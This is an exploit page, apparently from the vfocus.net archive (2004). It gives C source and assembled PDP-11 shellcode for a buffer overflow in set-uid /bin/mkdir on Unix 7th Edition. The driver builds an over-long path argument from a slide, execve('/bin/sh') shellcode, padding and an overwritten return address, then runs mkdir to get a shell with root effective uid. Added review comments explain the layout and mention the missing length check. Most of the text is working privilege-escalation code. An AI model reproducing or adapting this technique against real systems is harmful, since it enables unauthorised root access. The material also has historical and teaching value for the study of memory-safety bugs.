mkdir buffer overflow UNIX 7th Edition Exploit
来源:vfocus.net 作者:vfocus 发布时间:2004-06-04  

mkdir /bin/mkdir buffer overflow UNIX 7th Edition Exploit

/*
* Exploit for /bin/mkdir Unix V7 PDP-11.
* mkdir has a buffer overflow when checking if the directory
* in /arg/with/slashes/fname exists.
*
* This will run /bin/sh with euid 0, but not uid 0. Since
* the shell doesn't do anything special about this, we don't
* really care. If you care, run setuid(0); execl("/bin/sh", 0);
*/

/*
.globl _main
_main:
mov pc,r1
sub $-[sh-_main-2], r1 / pointer to sh
mov r1, r2
sub $-8, r2
clrb -1(r2) / null terminate
mov r1, r2
clr -(r1) / char *env[] = {0}
mov r1, r3
mov r2, -(r1) / char *argv[] = {sh, 0}
mov r1, r4
mov r3, -(r1) / reverse of sh,argv,env
mov r4, -(r1)
mov r2, -(r1)
sys 59.; 11111; 11111; 11111 / call execve
argv: 11111; 11111
sh: </bin/sh>
*/

/*
 * egg: pre-assembled machine code for the PDP-11, written as octal byte
 * values. The last seven non-zero bytes (057 0142 0151 0156 057 0163 0150)
 * are the ASCII string "/bin/sh"; the closing 0 terminates the array so
 * main() can handle it with the C string functions.
 * NOTE(review): presumably the assembled form of the commented-out listing
 * earlier in this file -- not verified byte-for-byte here.
 */
char egg[] = { 0301, 021, 0301, 0345, 0326, 0377, 0102, 020,
0302, 0345, 0370, 0377, 062, 0212, 0377, 0377,
0102, 020, 041, 012, 0103, 020, 0241, 020,
0104, 020, 0341, 020, 041, 021, 0241, 020,
073, 0211, 0111, 022, 0111, 022, 0111, 022,
0111, 022, 0111, 022, 057, 0142, 0151, 0156,
057, 0163, 0150, 0 };

/*
 * Layout constants for the argument string built in main().
 * NOPSLIDE - number of leading bytes filled with the repeating pair
 *            0301, 021 (the same two bytes that open egg). main() writes
 *            two bytes per iteration, so this value must stay even.
 * CNT      - byte offset at which main() stores the two bytes of PC; main()
 *            labels that store "overwrite retaddr".
 * PC       - 16-bit value stored at offset CNT, low byte first.
 * NOTE(review): CNT and PC are hard-coded; presumably they match one specific
 * /bin/mkdir binary and its stack layout -- the page does not say which.
 */
#define NOPSLIDE 50
#define CNT 136
#define PC 0xfea0

/*
 * Proof-of-concept driver: builds one over-long argument and exec's
 * /bin/mkdir with it. argc and argv are not used.
 *
 * The file header attributes the defect to a buffer overflow in mkdir when
 * it checks whether the directory part of a path containing slashes exists.
 * NOTE(review): mkdir's source is not shown here; presumably the path is
 * copied into a fixed-size buffer without a length check. The corrective
 * action on the mkdir side would be to reject or bound the argument length
 * before that copy -- confirm against the mkdir source.
 * NOTE(review): the header's "euid 0, but not uid 0" suggests /bin/mkdir is
 * installed set-uid root, which is what turns the overflow into a privilege
 * boundary problem -- confirm on the target system.
 *
 * Written in pre-ANSI (K&R) C: implicit int return type, and no declarations
 * for strcpy, strlen or execv.
 */
main(argc, argv)
int argc;
char **argv;
{
char buf[400];
int i;
char *argv2[4];

/* Fill buf[0..NOPSLIDE-1] with the 0301, 021 pair, then copy egg after it.
 * strcpy stops at egg's terminating 0, so egg must contain no other zero
 * byte (the array as written has none). */
for(i = 0; i < NOPSLIDE; ) {
buf[i++] = 0301;
buf[i++] = 021;
}
strcpy(buf + i, egg);

/* Pad with 'a' up to offset CNT. strlen relies on the terminator strcpy
 * just wrote; the padding then overwrites it. */
for(i = strlen(buf); i < CNT; i++)
buf[i] = 'a';

/* Store PC at offset CNT, low byte first, then high byte. */
buf[i++] = PC & 0xff;
buf[i++] = PC >> 8;

/* Append "/a" and the terminating 0.
 * NOTE(review): presumably the '/' is what makes mkdir take the
 * path-with-slashes check the header describes -- confirm. */
buf[i++] = '/';
buf[i++] = 'a';
buf[i++] = 0;

/* The finished string occupies CNT + 5 bytes, well inside buf[400].
 * Only the first three of argv2's four slots are used. */
argv2[0] = "/bin/mkdir";
argv2[1] = buf;
argv2[2] = 0;
/* execv only returns on failure; the failure is not reported and the
 * program still exits with status 0. */
execv(argv2[0], argv2);
return 0;
}




 